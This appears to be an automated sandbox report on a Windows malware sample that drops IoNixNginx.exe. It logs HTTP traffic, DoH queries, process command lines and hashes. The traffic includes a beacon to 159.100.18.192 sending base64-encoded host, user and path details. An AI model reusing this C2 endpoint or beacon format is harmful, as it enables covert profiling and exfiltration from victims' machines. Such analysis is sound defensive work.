                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Dec 13, 2024 14:47:41.625247002 CET666OUTGET /login.php?event=init&id=cHJlZmluYWw=&data=OCBHQl9bb2JqZWN0IE9iamVjdF1fWU5SODJfdHJ1ZV8xMjgweDEwMjRfV2luZG93cyAxMCBQcm9fMTA4IG1pbnV0ZXMgKDAuODAgaG91cnMpX0M6XFVzZXJzXGZyb250ZGVza18wNjY2NTZfZnJvbnRkZXNrX1dpbmRvd3NfTlRfeDY0XzEwLjAuMTkwNDVfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBfRlJPTlRERVNLLVBDX19JbnRlbDY0IEZhbWlseSA2IE1vZGVsIDE0MyBTdGVwcGluZyA4LCBHZW51aW5lSW50ZWxfQU1ENjRfQzpfMl9DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBcMnB2dFBFUzV0N2FvVjNlWG5Xcnl3eXRGaTEwXElvTml4TmdpbnguZXhl HTTP/1.1
                                                                                                                                                                      Accept: application/json, text/plain, */*
                                                                                                                                                                      User-Agent: axios/0.27.2
                                                                                                                                                                      Host: 159.100.18.192
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Dec 13, 2024 14:47:42.893603086 CET199INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                      Date: Fri, 13 Dec 2024 13:47:42 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 66 0d 0a 42 75 69 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: fBuild not found0


                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.749771172.217.19.2284431964C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-13 13:47:00 UTC128OUTGET / HTTP/1.1
                                                                                                                                                                      Accept: application/json, text/plain, */*
                                                                                                                                                                      User-Agent: axios/0.27.2
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-13 13:47:01 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 13 Dec 2024 13:47:00 GMT
                                                                                                                                                                      Expires: -1
                                                                                                                                                                      Cache-Control: private, max-age=0
                                                                                                                                                                      Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-28C_MpSOMizgN7oqpf6HtQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                      Server: gws
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Set-Cookie: AEC=AZ6Zc-UmZ4fWg7weI9uV1WB7shxgHt517lN237s5lIGLU6itRu13qT0Awdg; expires=Wed, 11-Jun-2025 13:47:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                      Set-Cookie: NID=520=Qzo4hMXqeMlqGCo7Dbwq5MtklheHisPIrOOJrNaqo1BPTpBXW4Z7S_Ow_JB7MX1G5jN-ejZLm3fIRUYK2q9hOvHKs6mjA4bz9PRTJ0YG_DPauDiisLmnQQlbL1Dw3UCM2WALuET7J2rkCai-ZrKqT20hxpJlpXpx9vnYUs-aDcQ1PW87Kcpl-VRVzrQiBwyjZZaRBxU8; expires=Sat, 14-Jun-2025 13:47:00 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      2024-12-13 13:47:01 UTC201INData Raw: 32 64 38 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20
                                                                                                                                                                      Data Ascii: 2d80<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many
                                                                                                                                                                      2024-12-13 13:47:01 UTC1390INData Raw: 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 6c 6f 67 6f 73 2f 64 6f 6f 64 6c 65 73 2f 32 30 32 34 2f 73 65 61 73 6f 6e 61 6c 2d 68 6f 6c 69 64 61 79 73 2d 32 30 32 34 2d 36 37 35 33 36
                                                                                                                                                                      Data Ascii: special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/logos/doodles/2024/seasonal-holidays-2024-67536
                                                                                                                                                                      2024-12-13 13:47:01 UTC1390INData Raw: 37 35 30 39 2c 31 31 38 31 34 2c 31 36 33 35 2c 32 39 32 37 36 2c 32 37 30 38 33 2c 35 32 31 33 36 37 32 2c 35 38 34 2c 35 39 39 32 32 37 31 2c 32 38 34 32 34 38 32 2c 34 2c 34 2c 33 2c 37 34 2c 36 2c 31 30 2c 31 2c 31 2c 31 2c 31 35 2c 32 37 39 37 38 31 31 33 2c 32 35 32 32 34 30 34 35 2c 33 33 39 36 2c 31 32 34 30 2c 31 36 34 33 36 2c 32 37 32 37 2c 34 36 32 39 35 2c 33 35 30 32 33 2c 32 32 36 32 32 2c 38 38 35 2c 31 34 32 38 30 2c 38 31 38 31 2c 35 39 33 34 2c 38 34 35 33 2c 33 34 38 39 2c 33 31 35 35 34 2c 31 39 30 31 31 2c 32 36 35 39 2c 33 34 33 35 2c 33 33 31 39 2c 32 33 38 37 39 2c 39 31 33 39 2c 37 34 34 2c 31 2c 33 2c 31 33 2c 33 38 33 38 2c 33 32 38 2c 34 34 35 36 2c 31 37 36 39 2c 31 31 31 37 2c 36 38 35 36 2c 31 39 37 33 2c 31 2c 31 2c 35 2c
                                                                                                                                                                      Data Ascii: 7509,11814,1635,29276,27083,5213672,584,5992271,2842482,4,4,3,74,6,10,1,1,1,15,27978113,25224045,3396,1240,16436,2727,46295,35023,22622,885,14280,8181,5934,8453,3489,31554,19011,2659,3435,3319,23879,9139,744,1,3,13,3838,328,4456,1769,1117,6856,1973,1,1,5,
                                                                                                                                                                      2024-12-13 13:47:01 UTC1390INData Raw: 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a 61 2e 73 74 76 73 63 29 3f 67 6f 6f 67 6c 65 2e 6b 45 49 3d 5f 67 2e 6b 45 49 3a 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 5f 67 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 73 6e 3d 27 77 65 62 68 70 27 3b 67 6f 6f 67 6c 65 2e 6b 48 4c 3d 27 65 6e 27 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 67 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 7c 7c 6e 75 6c 6c 7d 3b 76 61 72 20 6c 2c 6d 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 66 6f 72
                                                                                                                                                                      Data Ascii: indow.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var g=this||self;function k(){return window.google&&window.google.kOPI||null};var l,m=[];function n(a){for
                                                                                                                                                                      2024-12-13 13:47:01 UTC1390INData Raw: 72 6e 21 31 7d 29 3b 76 61 72 20 65 3b 28 65 3d 67 6f 6f 67 6c 65 29 2e 73 78 7c 7c 28 65 2e 73 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 73 79 2e 70 75 73 68 28 61 29 7d 29 3b 67 6f 6f 67 6c 65 2e 6c 6d 3d 5b 5d 3b 76 61 72 20 66 3b 28 66 3d 67 6f 6f 67 6c 65 29 2e 70 6c 6d 7c 7c 28 66 2e 70 6c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 6c 6d 2e 70 75 73 68 2e 61 70 70 6c 79 28 67 6f 6f 67 6c 65 2e 6c 6d 2c 61 29 7d 29 3b 67 6f 6f 67 6c 65 2e 6c 71 3d 5b 5d 3b 76 61 72 20 67 3b 28 67 3d 67 6f 6f 67 6c 65 29 2e 6c 6f 61 64 7c 7c 28 67 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 5b 61 5d 2c 62 2c 63 5d 29 7d 29 3b 76 61 72 20 68 3b 28 68 3d 67 6f
                                                                                                                                                                      Data Ascii: rn!1});var e;(e=google).sx||(e.sx=function(a){google.sy.push(a)});google.lm=[];var f;(f=google).plm||(f.plm=function(a){google.lm.push.apply(google.lm,a)});google.lq=[];var g;(g=google).load||(g.load=function(a,b,c){google.lq.push([[a],b,c])});var h;(h=go
                                                                                                                                                                      2024-12-13 13:47:01 UTC1390INData Raw: 2e 67 62 69 20 2e 67 62 34 7b 63 6f 6c 6f 72 3a 23 64 64 38 65 32 37 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 66 20 2e 67 62 34 7b 63 6f 6c 6f 72 3a 23 39 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 74 64 2c 61 2c 70 2c 2e 68 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 7d 23 67 6f 67 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 38 70 78 20 30 7d 74 64 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 38 65 6d 7d 2e 67 61 63 5f 6d 20 74 64 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 66 6f 72 6d 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 7d 2e 68
                                                                                                                                                                      Data Ascii: .gbi .gb4{color:#dd8e27 !important}.gbf .gb4{color:#900 !important}</style><style>body,td,a,p,.h{font-family:arial,sans-serif}body{margin:0;overflow-y:scroll}#gog{padding:3px 8px 0}td{line-height:.8em}.gac_m td{line-height:17px}form{margin-bottom:20px}.h
                                                                                                                                                                      2024-12-13 13:47:01 UTC1390INData Raw: 6e 75 6c 6c 3f 71 3a 21 30 2c 74 3d 30 2c 75 2c 77 3d 67 6f 6f 67 6c 65 2e 65 72 64 2c 78 3d 77 2e 6a 73 72 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 6e 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 32 3a 65 3b 62 26 26 28 75 3d 61 26 26 61 2e 6d 65 73 73 61 67 65 29 3b 64 3d 3d 3d 76 6f 69 64 20 30 26 26 28 64 3d 7b 7d 29 3b 64 2e 63 61 64 3d 22 70 6c 65 5f 22 2b 67 6f 6f 67 6c 65 2e 70 6c 65 2b 22 2e 61 70 6c 65 5f 22 2b 67 6f 6f 67 6c 65 2e 61 70 6c 65 3b 69 66 28 67 6f 6f 67 6c 65 2e 64 6c 29 72 65 74 75 72 6e 20 67 6f 6f 67 6c 65 2e 64 6c 28 61 2c 65 2c 64 2c 21 30 29 2c 6e 75 6c 6c 3b 62 3d 64 3b 69 66 28 78 3c 30 29 7b 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28
                                                                                                                                                                      Data Ascii: null?q:!0,t=0,u,w=google.erd,x=w.jsr;google.ml=function(a,b,d,n,e){e=e===void 0?2:e;b&&(u=a&&a.message);d===void 0&&(d={});d.cad="ple_"+google.ple+".aple_"+google.aple;if(google.dl)return google.dl(a,e,d,!0),null;b=d;if(x<0){window.console&&console.error(
                                                                                                                                                                      2024-12-13 13:47:01 UTC1390INData Raw: 6e 75 6c 6c 3b 72 26 26 74 3e 3d 6c 26 26 28 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 29 7d 3b 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 38 43 5f 4d 70 53 4f 4d 69 7a 67 4e 37 6f 71 70 66 36 48 74 51 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 72 63 3d 27 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 27 3b 76 61 72 20 69 65 73 67 3d 66 61 6c 73 65 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6e 20 26 26 20 77 69 6e 64 6f 77 2e 6e 28 29 3b 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 69 6d 61 67 65 73
                                                                                                                                                                      Data Ascii: null;r&&t>=l&&(window.onerror=null)};})();</script></head><body bgcolor="#fff"><script nonce="28C_MpSOMizgN7oqpf6HtQ">(function(){var src='/images/nav_logo229.png';var iesg=false;document.body.onload = function(){window.n && window.n();if (document.images
                                                                                                                                                                      2024-12-13 13:47:01 UTC1390INData Raw: 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 26 65 63 3d 47 41 5a 41 41 51 22 20 63 6c 61 73 73 3d 67 62 34 3e 53 69 67 6e 20 69 6e 3c 2f 61 3e 3c 2f 6e 6f 62 72 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 68 20 73 74 79 6c 65 3d 6c 65 66 74 3a 30 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 68 20 73 74 79 6c 65 3d 72 69 67 68 74 3a 30 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 63 65 6e 74 65 72 3e 3c 62 72 20 63 6c 65 61 72 3d 22 61 6c 6c 22 20 69 64 3d 22 6c 67 70 64 22 3e 3c 64 69 76 20 69 64 3d 22 58 6a 68 48 47 66 22 3e 3c 69 6d 67 20 61 6c 74 3d 22 53 65 61 73 6f 6e 61 6c 20 48 6f 6c 69 64 61 79 73 20 32 30 32 34 22 20 62 6f 72 64 65 72 3d 22 30 22 20 68 65 69 67 68 74 3d 22 32 30 30 22 20 73 72 63 3d
                                                                                                                                                                      Data Ascii: tps://www.google.com/&ec=GAZAAQ" class=gb4>Sign in</a></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div></div><center><br clear="all" id="lgpd"><div id="XjhHGf"><img alt="Seasonal Holidays 2024" border="0" height="200" src=
                                                                                                                                                                      2024-12-13 13:47:01 UTC335INData Raw: 28 29 7b 69 66 20 28 74 68 69 73 2e 66 6f 72 6d 2e 71 2e 76 61 6c 75 65 29 7b 74 68 69 73 2e 63 68 65 63 6b 65 64 20 3d 20 31 3b 69 66 20 28 74 68 69 73 2e 66 6f 72 6d 2e 69 66 6c 73 69 67 29 74 68 69 73 2e 66 6f 72 6d 2e 69 66 6c 73 69 67 2e 64 69 73 61 62 6c 65 64 20 3d 20 66 61 6c 73 65 3b 7d 0a 65 6c 73 65 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 27 2f 64 6f 6f 64 6c 65 73 2f 27 3b 7d 3b 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 41 4c 39 68 62 64 67 41 41 41 41 41 5a 31 78 49 35 4c 6a 73 53 4f 48 32 6a 35 35 61 6b 36 6d 41 6e 6e 32 58 53 52 34 63 72 74 51 45 22 20 6e 61 6d 65 3d 22 69 66 6c 73 69 67 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 74 64 3e 3c 74
                                                                                                                                                                      Data Ascii: (){if (this.form.q.value){this.checked = 1;if (this.form.iflsig)this.form.iflsig.disabled = false;}else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ1xI5LjsSOH2j55ak6mAnn2XSR4crtQE" name="iflsig" type="hidden"></span></span></td><t


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.749807172.64.41.34435076C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-13 13:47:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                      2024-12-13 13:47:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                      2024-12-13 13:47:16 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      Date: Fri, 13 Dec 2024 13:47:16 GMT
                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                      CF-RAY: 8f1667b5ca308c45-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-12-13 13:47:16 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: wwwgstaticcom'P#)


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.749812172.64.41.34435076C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-13 13:47:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                      2024-12-13 13:47:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:08:46:20
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\AyqwnIUrcz.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:64'824'672 bytes
                                                                                                                                                                      MD5 hash:1E047B85B671CC99D941C13865F069DB
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:10:31:35
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Imagebase:0x7ff78f3a0000
                                                                                                                                                                      File size:160'084'992 bytes
                                                                                                                                                                      MD5 hash:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:13
                                                                                                                                                                      Start time:10:31:38
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /d /s /c "chcp"
                                                                                                                                                                      Imagebase:0x7ff7abc30000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:14
                                                                                                                                                                      Start time:10:31:38
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:15
                                                                                                                                                                      Start time:10:31:39
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:chcp
                                                                                                                                                                      Imagebase:0x7ff73c760000
                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:10:31:39
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                                                                                                      Imagebase:0x7ff78f3a0000
                                                                                                                                                                      File size:160'084'992 bytes
                                                                                                                                                                      MD5 hash:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
